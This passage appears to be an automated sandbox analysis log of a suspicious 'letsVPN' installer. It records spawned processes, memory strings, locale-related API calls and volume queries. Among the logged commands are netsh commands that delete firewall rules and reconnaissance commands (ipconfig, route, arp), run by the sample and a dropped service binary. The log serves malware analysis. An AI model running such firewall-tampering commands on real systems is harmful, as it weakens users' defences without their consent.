              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets.exe
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO.exe
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsVPN
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsVPN
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeProcess created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" checkNetFramework
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeProcess created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe"
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C ipconfig /all
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C route print
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C arp -a
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE route print
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ARP.EXE arp -a
              Source: LetsPRO.exe, 0000003D.00000002.3422609908.000000000EDCA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 8GetTaskmanWindowMessageBoxTimeoutWPrivateExtractIconExWRegisterLogonProcessRegisterServicesProcessRegisterSystemThreadRegisterTasklistSetInternalWindowPosSetLogonNotifyWindowSetProgmanWindowSetShellWindowExSetSysColorsTempSetTaskmanWindowSetWindowStationUserTileChildWindowsUserRealizePaletteUserRegisterWowHandlersBeginPanningFeedbackEndPanningFeedbackUpdatePanningFeedbackBeginBufferedAnimationBeginBufferedPaintBufferedPaintClearBufferedPaintInitBufferedPaintSetAlphaBufferedPaintUnInitDrawThemeBackgroundDrawThemeBackgroundExEndBufferedAnimationEndBufferedPaintGetBufferedPaintBitsGetBufferedPaintDCGetCurrentThemeNameGetThemeAppPropertiesGetThemeEnumValueGetThemeFilenameGetThemePartSizeGetThemePositionGetThemePropertyOriginGetThemeSysColorGetThemeSysColorBrushGetThemeSysStringGetThemeTextExtentGetThemeTextMetricsHitTestThemeBackgroundIsThemePartDefinedSetThemeAppPropertiesGetFileVersionInfoSizeWGetFileVersionInfoWDrvGetModuleHandleGetDriverModuleHandleSendDriverMessagejoyReleaseCapturemciGetCreatorTaskmciGetErrorStringWmidiInGetDevCapsWmidiInGetErrorTextWmidiInGetNumDevsmidiInPrepareHeadermidiInUnprepareHeadermidiOutCacheDrumPatchesmidiOutCachePatchesmidiOutGetDevCapsWmidiOutGetErrorTextWmidiOutGetNumDevsmidiOutGetVolumemidiOutPrepareHeadermidiOutSetVolumemidiOutUnprepareHeadermidiStreamPositionmidiStreamPropertymidiStreamRestartmixerGetControlDetailsWmixerGetDevCapsWmixerGetLineControlsWmixerGetLineInfoWmixerSetControlDetailsmmioInstallIOProcWmmioStringToFOURCCWtimeGetSystemTimewaveInGetDevCapsWwaveInGetErrorTextWwaveInGetNumDevswaveInGetPositionwaveInPrepareHeaderwaveInUnprepareHeaderwaveOutBreakLoopwaveOutGetDevCapsWwaveOutGetErrorTextWwaveOutGetNumDevswaveOutGetPlaybackRatewaveOutGetPositionwaveOutGetVolumewaveOutPrepareHeaderwaveOutSetPlaybackRatewaveOutSetVolumewaveOutUnprepareHeaderjoyConfigChangedmciFreeCommandResourcemciGetDriverDatamciLoadCommandResourcemciSetDriverDatammGetCurrentTaskmmsystemGetVersionWSAAddressToStringWWSAAsyncGetHostByAddrWSAAsyncGetHostByNameWSAAsyncGetProtoByNameWSAAsyncGetServByNameWSAAsyncGetServByPortWSACancelAsyncRequestWSACancelBlockingCallWSADuplicateSocketWWSAEnumNetworkEventsWSAEnumProtocolsWWSAGetOverlappedResultWSAGetServiceClassInfoWWSAInstallServiceClassWWSALookupServiceBeginWWSALookupServiceEndWSALookupServiceNextWWSAProviderConfigChangeWSARecvDisconnectWSARemoveServiceClassWSASendDisconnectWSASetBlockingHookWSAStringToAddressWWSAUnhookBlockingHookWSApSetPostRoutineWSCDeinstallProviderWSCEnableNSProviderWSCEnumProtocolsWSCGetProviderPathWSCInstallNameSpaceWSCInstallProviderWSCUnInstallNameSpaceWSCWriteProviderOrderGetComputerNameExW760639CoInitializeSecurity
              Source: letsvpn-latest.exe, 00000015.00000003.2351020724.0000000003102000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: letsvpn-latest.exe, 00000015.00000003.2520982126.00000000031F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AddFontResourceWAdjustWindowRectAlready ReportedAssocIsDangerousAuditSetSecurityBITMAPINFOHEADERBringWindowToTopCRYPT_OBJID_BLOBCertControlStoreCheckRadioButtonCloseEnhMetaFileCoCreateInstanceCoGetCallContextCoGetInterceptorCoMarshalHresultCoTaskMemReallocCombineTransformConnectNamedPipeContent-EncodingContent-LanguageContent-Length: CopyEnhMetaFileWCreateDIBSectionCreateDirectoryWCreateHatchBrushCreateIpNetEntryCreateJobObjectWCreateMDIWindowWCreateNamedPipeWCreatePolygonRgnCreateSemaphoreWCreateSolidBrushCreateTimerQueueCryptDestroyHashCryptExportPKCS8CryptGetKeyParamCryptMsgGetParamCryptProtectDataCryptQueryObjectCryptSetKeyParamDAD_SetDragImageDPA_EnumCallbackDdeQueryConvInfoDdeSetUserHandleDeactivateActCtxDefMDIChildProcWDefineDosDeviceWDeleteColorSpaceDeleteIpNetEntryDeleteTimerQueueDestination-PortDispatchMessageWDnsNameCompare_WDrawCaptionTempWDrawFrameControlDuplicateTokenExEndBufferedPaintEngCreatePaletteEngDeletePaletteEngDeleteSurfaceEngGetDriverNameEngStretchBltROPEngUnlockSurfaceEnumChildWindowsEnumICMProfilesWExcludeUpdateRgnExtSelectClipRgnFONTOBJ_vGetInfoFRAME_SIZE_ERRORFindFirstFreeAceFindFirstVolumeWFlushFileBuffersGC scavenge waitGC worker (idle)GODEBUG: value "GdiGetBatchLimitGdiIsMetaPrintDCGdiSetBatchLimitGetAsyncKeyStateGetBestInterfaceGetCalendarInfoWGetClassLongPtrWGetClipboardDataGetComputerNameWGetConsoleAliasWGetConsoleTitleWGetConsoleWindowGetCurrentActCtxGetCurrentObjectGetCurrentThreadGetDIBColorTableGetDesktopWindowGetDllDirectoryWGetExpandedNameWGetFileSecurityWGetFullPathNameWGetGUIThreadInfoGetGestureConfigGetGlyphIndicesWGetGlyphOutlineWGetInterfaceInfoGetIpErrorStringGetKerningPairsWGetKeyboardStateGetLastInputInfoGetLogicalDrivesGetLongPathNameWGetMenuItemCountGetMenuItemInfoWGetMenuPosFromIDGetModuleHandleWGetNamedPipeInfoGetNetworkParamsGetOpenFileNameWGetPriorityClassGetProgmanWindowGetSaveFileNameWGetScrollBarInfoGetStringScriptsGetSysColorBrushGetSystemMetricsGetTaskmanWindowGetTcpStatisticsGetTempFileNameWGetThemeFilenameGetThemePartSizeGetThemePositionGetThemeSysColorGetThreadDesktopGetUdpStatisticsGetViewportExtExGetViewportOrgExGlobalDeleteAtomHANIMATIONBUFFERHost-Remote-ListIConnectionPointICreateErrorInfoILLoadFromStreamINTERFACE_HANDLEIOleAdviseHolderIOleInPlaceFrameIP_PREFIX_ORIGINIP_SUFFIX_ORIGINIPropertyStorageIUnknown_GetSiteIUnknown_SetSiteI_CryptDetachTlsI_RpcSendReceiveIcmpParseRepliesImageList_CreateImageList_DrawExImageList_RemoveImmConfigureIMEWImmCreateContextImmGetGuideLineWImmGetOpenStatusImmGetVirtualKeyImmRegisterWordWImmSetOpenStatusImperial_AramaicInitializeFlatSBInstRuneAnyNotNLInterfaceRemovedIntlStrEqWorkerWIpReleaseAddressIsBadHugeReadPtrIsDBCSLeadByteExIsDialogMessageWIsTokenUntrustedIsValidInterfaceJasonMarshalFailK32EnumProcessesLCIDToLocaleNameLPFNVIEWCALLBACKLPPERSISTSTORAGELPPRINTPAGERANGELPSHELLFLAGSTATELPSHFILEOPSTRUCTLPWPUPOSTMESSAGELPWSANSCLASSINFOLocalLinkAddressLocaleNameToLCIDLockWindowUpdateMIB_IPADDRROW_XPMIB_IPFORWARDROWMapVirtualKeyExWMeroitic_CursiveMonitorF
              Source: LetsPRO.exe, 0000003D.00000002.3422609908.000000000EDCA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SetProgmanWindow
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_00525EA0 cpuid 19_2_00525EA0
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,_getptd,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,_getptd,EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,__crtDownlevelLCIDToLocaleName,__crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,_itow_s,0_2_0000000180023FF8
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,TestDefaultCountry,__crtGetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,__crtGetLocaleInfoEx,_invoke_watson,0_2_0000000180023040
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: __crtGetLocaleInfoEx,__crtGetLocaleInfoEx,WideCharToMultiByte,free,0_2_000000018001E840
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: __getlocaleinfo,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,0_2_00000001800148B8
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_000000018001E9AC
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,EnumSystemLocalesW,0_2_00000001800239DC
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,0_2_0000000180022280
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,EnumSystemLocalesW,0_2_0000000180023A90
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _calloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,free,free,free,0_2_0000000180021B1C
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,TestDefaultLanguage,0_2_0000000180023B24
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: __crtGetLocaleInfoEx,__crtGetLocaleInfoEx,GetACP,0_2_00000001800234AC
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: EnumSystemLocalesW,0_2_000000018001650C
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: __crtDownlevelLocaleNameToLCID,GetLocaleInfoW,0_2_0000000180016550
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,TestDefaultLanguage,0_2_0000000180023D54
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: __crtGetLocaleInfoEx,0_2_0000000180023560
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _calloc_crt,free,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,free,free,free,free,0_2_00000001800215B0
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,__crtGetUserDefaultLocaleName,_invoke_watson,_invoke_watson,_getptd,_getptd,LcidFromHexString,GetLocaleInfoW,0_2_0000000180023664
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0000000180023EA0
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,__crtGetLocaleInfoEx,_calloc_crt,__crtGetLocaleInfoEx,free,__crtGetLocaleInfoEx,_invoke_watson,0_2_000000018001674C
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,GetLocaleInfoW,0_2_0000000180023F50
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: __crtGetLocaleInfoEx,GetLocaleInfoW,19_2_6D0A0F41
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: GetLocaleInfoW,_errno,_invalid_parameter_noinfo,_errno,_errno,_errno,_invalid_parameter_noinfo,19_2_6D09CADD
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: __crtGetLocaleInfoEx,_wcsicmp,_wcsnicmp,_TestDefaultCountry,wcslen,wcsncpy_s,_getptd,__crtGetLocaleInfoEx,_wcsicmp,__crtGetLocaleInfoEx,_wcsicmp,wcslen,wcsncpy_s,wcslen,_TestDefaultCountry,wcslen,_invoke_watson,__crtGetLocaleInfoEx,19_2_6D0A8579
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: __crtGetLocaleInfoEx,wcsncmp,19_2_6D0A845E
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: __crtEnumSystemLocalesEx,EnumSystemLocalesW,19_2_6D0A8660
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: wcslen,wcslen,__crtEnumSystemLocalesEx,19_2_6D0A8683
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: _getptd,IsValidCodePage,wcslen,wcsncpy_s,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,wcschr,wcschr,_itow_s,_GetLocaleNameFromLanguage,_GetLocaleNameFromLanguage,__crtGetLocaleInfoEx,_invoke_watson,19_2_6D0A8036
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: wcscmp,wcscmp,_wtol,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,GetACP,19_2_6D0A7FE9
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: wcscmp,wcscmp,GetLocaleInfoW,_wtol,GetLocaleInfoW,GetACP,19_2_6D12996B
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: _getptd,_getptd,_LcidFromHexString,GetLocaleInfoW,_wcsicmp,_wcsicmp,_TestDefaultLanguage,19_2_6D129841
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: __crtGetLocaleInfoEx,free,_calloc_crt,strncpy_s,__crtGetLocaleInfoEx,_calloc_crt,__crtGetLocaleInfoEx,GetLastError,_calloc_crt,free,free,_invoke_watson,_malloc_crt,memcpy,_siglookup,19_2_6D0A1BFC
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: _getptd,GetLocaleInfoW,_GetPrimaryLen,wcslen,19_2_6D129A2C
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: __crtGetLocaleInfoEx,__crtGetLocaleInfoEx,WideCharToMultiByte,_freea_s,malloc,19_2_6D0A1A74
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: _getptd,memset,_getptd,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,_itow_s,19_2_6D129A96
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: _getptd,wcslen,EnumSystemLocalesW,19_2_6D12950C
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: _getptd,wcslen,wcslen,_GetPrimaryLen,EnumSystemLocalesW,19_2_6D12954C
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: _getptd,wcslen,_GetPrimaryLen,EnumSystemLocalesW,19_2_6D1295C9
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: _getptd,_getptd,_LcidFromHexString,GetLocaleInfoW,_wcsicmp,19_2_6D12945C
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: EnumSystemLocalesW,58_2_006980E1
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: EnumSystemLocalesW,58_2_00698096
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: EnumSystemLocalesW,58_2_0069817C
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: GetLocaleInfoW,58_2_0069219D
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,58_2_00698207
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: GetLocaleInfoW,58_2_0069845C
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: EnumSystemLocalesW,58_2_00691CFD
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,58_2_00697DF0
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,58_2_00698584
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: GetLocaleInfoW,58_2_0069868C
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,58_2_0069875F
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 33_2_00007FF7961920D8 ??2@YAPEAX_K@Z,GetLastError,??3@YAXPEAX@Z,??2@YAPEAX_K@Z,SetupDiGetDeviceRegistryPropertyW,??3@YAXPEAX@Z,33_2_00007FF7961920D8
              Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\ProgramData\letsvpn-latest.exeQueries volume information: C:\ VolumeInformation
              Source: C:\ProgramData\letsvpn-latest.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
